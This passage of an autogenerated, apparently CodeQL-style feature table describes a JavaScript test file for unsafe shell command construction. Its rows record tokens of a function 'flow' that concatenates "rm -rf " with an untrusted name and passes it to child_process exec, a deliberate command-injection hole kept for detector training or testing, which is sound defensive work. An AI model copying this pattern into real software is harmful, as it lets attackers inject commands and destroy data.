autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:33:53:36 | name | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:33:53:36 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:33:53:36 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:6:54:9 | cmd1 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:6:54:9 | cmd1 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:6:54:9 | cmd1 | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:6:54:9 | cmd1 | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:6:54:9 | cmd1 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:6:54:28 | cmd1 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:6:54:28 | cmd1 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:6:54:28 | cmd1 | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:6:54:28 | cmd1 | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:6:54:28 | cmd1 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:6:54:28 | cmd1 = ... + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:6:54:28 | cmd1 = ... + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:6:54:28 | cmd1 = ... + name | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:6:54:28 | cmd1 = ... + name | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:6:54:28 | cmd1 = ... + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:13:54:21 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:13:54:21 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:13:54:21 | "rm -rf " | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:13:54:21 | "rm -rf " | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:13:54:21 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:13:54:21 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:13:54:28 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:13:54:28 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:13:54:28 | "rm -rf " + name | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:13:54:28 | "rm -rf " + name | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:13:54:28 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:25:54:28 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:25:54:28 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:25:54:28 | name | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:25:54:28 | name | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:25:54:28 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:54:25:54:28 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:3 | cp | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:3 | cp | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:8 | cp.exec | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:8 | cp.exec | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:14 | cp.exec(cmd1) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:14 | cp.exec(cmd1) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:14 | cp.exec(cmd1) | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:14 | cp.exec(cmd1) | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:14 | cp.exec(cmd1) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:14 | exceptional return of cp.exec(cmd1) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:14 | exceptional return of cp.exec(cmd1) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:14 | exceptional return of cp.exec(cmd1) | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:14 | exceptional return of cp.exec(cmd1) | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:14 | exceptional return of cp.exec(cmd1) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:5:55:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:5:55:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:5:55:8 | exec | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:5:55:8 | exec | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:5:55:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:10:55:13 | cmd1 | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:10:55:13 | cmd1 | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:10:55:13 | cmd1 | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:10:55:13 | cmd1 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:10:55:13 | cmd1 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:10:55:13 | cmd1 | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:10:55:13 | cmd1 | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:10:55:13 | cmd1 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:10:55:13 | cmd1 | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:6:57:9 | cmd2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:6:57:9 | cmd2 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:6:57:9 | cmd2 | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:6:57:9 | cmd2 | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:6:57:9 | cmd2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:6:57:28 | cmd2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:6:57:28 | cmd2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:6:57:28 | cmd2 | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:57:6:57:28 | cmd2 | enclosingFunctionName | flow | +| 